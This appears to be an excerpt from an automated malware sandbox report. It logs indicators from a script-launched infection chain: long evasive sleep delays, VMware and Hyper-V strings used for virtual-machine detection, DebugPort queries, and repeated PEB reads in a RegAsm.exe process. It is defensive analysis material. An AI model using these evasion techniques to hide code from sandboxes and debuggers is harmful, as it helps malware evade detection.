                Source: C:\Users\user\AppData\Local\Temp\x.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3503
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3129
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Window / User API: threadDelayed 9841
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | API coverage: 0.8 %
                Source: C:\Windows\SysWOW64\MRINFO.EXE | API coverage: 3.2 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1620 | Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3368 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6008 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\MRINFO.EXE TID: 6480 | Thread sleep count: 131 > 30
                Source: C:\Windows\SysWOW64\MRINFO.EXE TID: 6480 | Thread sleep time: -262000s >= -30000s
                Source: C:\Windows\SysWOW64\MRINFO.EXE TID: 6480 | Thread sleep count: 9841 > 30
                Source: C:\Windows\SysWOW64\MRINFO.EXE TID: 6480 | Thread sleep time: -19682000s >= -30000s
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe TID: 2860 | Thread sleep time: -40000s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Last function: Thread delayed (2 occurrences)
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_0306CA70 | FindFirstFileW,FindNextFileW,FindClose | 10_2_0306CA70
                Source: powershell.exe, 00000001.00000002.1915624827.0000026D2323A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#1
                Source: powershell.exe, 00000001.00000002.1915624827.0000026D2323A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: wscript.exe, 00000000.00000002.1934243239.00000174E7A2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1923386809.00000174E7A27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWfd
                Source: wscript.exe, 00000000.00000002.1935377292.00000174E9C65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2988938123.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                Source: wscript.exe, 00000000.00000002.1935377292.00000174E9C30000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032ED000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2426979610.000001EDA820D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00417DE3 | LdrLoadDll | 5_2_00417DE3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BA92BC | mov eax, dword ptr fs:[00000030h] | 5_2_02BA92BC (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BA92BC | mov ecx, dword ptr fs:[00000030h] | 5_2_02BA92BC (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B302A0 | mov eax, dword ptr fs:[00000030h] | 5_2_02B302A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B302A0 mov eax, dword ptr fs:[00000030h]5_2_02B302A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B352A0 mov eax, dword ptr fs:[00000030h]5_2_02B352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B352A0 mov eax, dword ptr fs:[00000030h]5_2_02B352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B352A0 mov eax, dword ptr fs:[00000030h]5_2_02B352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B352A0 mov eax, dword ptr fs:[00000030h]5_2_02B352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE92A6 mov eax, dword ptr fs:[00000030h]5_2_02BE92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE92A6 mov eax, dword ptr fs:[00000030h]5_2_02BE92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE92A6 mov eax, dword ptr fs:[00000030h]5_2_02BE92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE92A6 mov eax, dword ptr fs:[00000030h]5_2_02BE92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB72A0 mov eax, dword ptr fs:[00000030h]5_2_02BB72A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB72A0 mov eax, dword ptr fs:[00000030h]5_2_02BB72A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB62A0 mov eax, dword ptr fs:[00000030h]5_2_02BB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB62A0 mov ecx, dword ptr fs:[00000030h]5_2_02BB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB62A0 mov eax, dword ptr fs:[00000030h]5_2_02BB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB62A0 mov eax, dword ptr fs:[00000030h]5_2_02BB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB62A0 mov eax, dword ptr fs:[00000030h]5_2_02BB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB62A0 mov eax, dword ptr fs:[00000030h]5_2_02BB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5329E mov eax, dword ptr fs:[00000030h]5_2_02B5329E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5329E mov eax, dword ptr fs:[00000030h]5_2_02B5329E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5E284 mov eax, dword ptr fs:[00000030h]5_2_02B5E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5E284 mov eax, dword ptr fs:[00000030h]5_2_02B5E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA0283 mov eax, dword ptr fs:[00000030h]5_2_02BA0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA0283 mov eax, dword ptr fs:[00000030h]5_2_02BA0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA0283 mov eax, dword ptr fs:[00000030h]5_2_02BA0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF5283 mov eax, dword ptr fs:[00000030h]5_2_02BF5283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDF2F8 mov eax, dword ptr fs:[00000030h]5_2_02BDF2F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B192FF mov eax, dword ptr fs:[00000030h]5_2_02B192FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B302E1 mov eax, dword ptr fs:[00000030h]5_2_02B302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B302E1 mov eax, dword ptr fs:[00000030h]5_2_02B302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B302E1 mov eax, dword ptr fs:[00000030h]5_2_02B302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF52E2 mov eax, dword ptr fs:[00000030h]5_2_02BF52E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B2D3 mov eax, dword ptr fs:[00000030h]5_2_02B1B2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B2D3 mov eax, dword ptr fs:[00000030h]5_2_02B1B2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B2D3 mov eax, dword ptr fs:[00000030h]5_2_02B1B2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4F2D0 mov eax, dword ptr fs:[00000030h]5_2_02B4F2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4F2D0 mov eax, dword ptr fs:[00000030h]5_2_02B4F2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A2C3 mov eax, dword ptr fs:[00000030h]5_2_02B2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A2C3 mov eax, dword ptr fs:[00000030h]5_2_02B2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A2C3 mov eax, dword ptr fs:[00000030h]5_2_02B2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A2C3 mov eax, dword ptr fs:[00000030h]5_2_02B2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A2C3 mov eax, dword ptr fs:[00000030h]5_2_02B2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B292C5 mov eax, dword ptr fs:[00000030h]5_2_02B292C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B292C5 mov eax, dword ptr fs:[00000030h]5_2_02B292C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1823B mov eax, dword ptr fs:[00000030h]5_2_02B1823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF5227 mov eax, dword ptr fs:[00000030h]5_2_02BF5227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B57208 mov eax, dword ptr fs:[00000030h]5_2_02B57208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B57208 mov eax, dword ptr fs:[00000030h]5_2_02B57208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B49274 mov eax, dword ptr fs:[00000030h]5_2_02B49274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B61270 mov eax, dword ptr fs:[00000030h]5_2_02B61270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B61270 mov eax, dword ptr fs:[00000030h]5_2_02B61270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B24260 mov eax, dword ptr fs:[00000030h]5_2_02B24260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B24260 mov eax, dword ptr fs:[00000030h]5_2_02B24260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B24260 mov eax, dword ptr fs:[00000030h]5_2_02B24260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BED26B mov eax, dword ptr fs:[00000030h]5_2_02BED26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BED26B mov eax, dword ptr fs:[00000030h]5_2_02BED26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1826B mov eax, dword ptr fs:[00000030h]5_2_02B1826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1A250 mov eax, dword ptr fs:[00000030h]5_2_02B1A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDB256 mov eax, dword ptr fs:[00000030h]5_2_02BDB256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDB256 mov eax, dword ptr fs:[00000030h]5_2_02BDB256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B26259 mov eax, dword ptr fs:[00000030h]5_2_02B26259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19240 mov eax, dword ptr fs:[00000030h]5_2_02B19240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19240 mov eax, dword ptr fs:[00000030h]5_2_02B19240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5724D mov eax, dword ptr fs:[00000030h]5_2_02B5724D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B433A5 mov eax, dword ptr fs:[00000030h]5_2_02B433A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B533A0 mov eax, dword ptr fs:[00000030h]5_2_02B533A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B533A0 mov eax, dword ptr fs:[00000030h]5_2_02B533A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF539D mov eax, dword ptr fs:[00000030h]5_2_02BF539D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B18397 mov eax, dword ptr fs:[00000030h]5_2_02B18397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B18397 mov eax, dword ptr fs:[00000030h]5_2_02B18397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B18397 mov eax, dword ptr fs:[00000030h]5_2_02B18397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B7739A mov eax, dword ptr fs:[00000030h]5_2_02B7739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B7739A mov eax, dword ptr fs:[00000030h]5_2_02B7739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1E388 mov eax, dword ptr fs:[00000030h]5_2_02B1E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1E388 mov eax, dword ptr fs:[00000030h]5_2_02B1E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1E388 mov eax, dword ptr fs:[00000030h]5_2_02B1E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4438F mov eax, dword ptr fs:[00000030h]5_2_02B4438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4438F mov eax, dword ptr fs:[00000030h]5_2_02B4438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF53FC mov eax, dword ptr fs:[00000030h]5_2_02BF53FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E3F0 mov eax, dword ptr fs:[00000030h]5_2_02B3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E3F0 mov eax, dword ptr fs:[00000030h]5_2_02B3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E3F0 mov eax, dword ptr fs:[00000030h]5_2_02B3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B563FF mov eax, dword ptr fs:[00000030h]5_2_02B563FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDF3E6 mov eax, dword ptr fs:[00000030h]5_2_02BDF3E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDB3D0 mov ecx, dword ptr fs:[00000030h]5_2_02BDB3D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDC3CD mov eax, dword ptr fs:[00000030h]5_2_02BDC3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A3C0 mov eax, dword ptr fs:[00000030h]5_2_02B2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A3C0 mov eax, dword ptr fs:[00000030h]5_2_02B2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A3C0 mov eax, dword ptr fs:[00000030h]5_2_02B2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A3C0 mov eax, dword ptr fs:[00000030h]5_2_02B2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A3C0 mov eax, dword ptr fs:[00000030h]5_2_02B2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A3C0 mov eax, dword ptr fs:[00000030h]5_2_02B2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B283C0 mov eax, dword ptr fs:[00000030h]5_2_02B283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B283C0 mov eax, dword ptr fs:[00000030h]5_2_02B283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B283C0 mov eax, dword ptr fs:[00000030h]5_2_02B283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B283C0 mov eax, dword ptr fs:[00000030h]5_2_02B283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA63C0 mov eax, dword ptr fs:[00000030h]5_2_02BA63C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B17330 mov eax, dword ptr fs:[00000030h]5_2_02B17330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE132D mov eax, dword ptr fs:[00000030h]5_2_02BE132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE132D mov eax, dword ptr fs:[00000030h]5_2_02BE132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4F32A mov eax, dword ptr fs:[00000030h]5_2_02B4F32A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1C310 mov ecx, dword ptr fs:[00000030h]5_2_02B1C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B40310 mov ecx, dword ptr fs:[00000030h]5_2_02B40310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA930B mov eax, dword ptr fs:[00000030h]5_2_02BA930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA930B mov eax, dword ptr fs:[00000030h]5_2_02BA930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA930B mov eax, dword ptr fs:[00000030h]5_2_02BA930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5A30B mov eax, dword ptr fs:[00000030h]5_2_02B5A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5A30B mov eax, dword ptr fs:[00000030h]5_2_02B5A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5A30B mov eax, dword ptr fs:[00000030h]5_2_02B5A30B
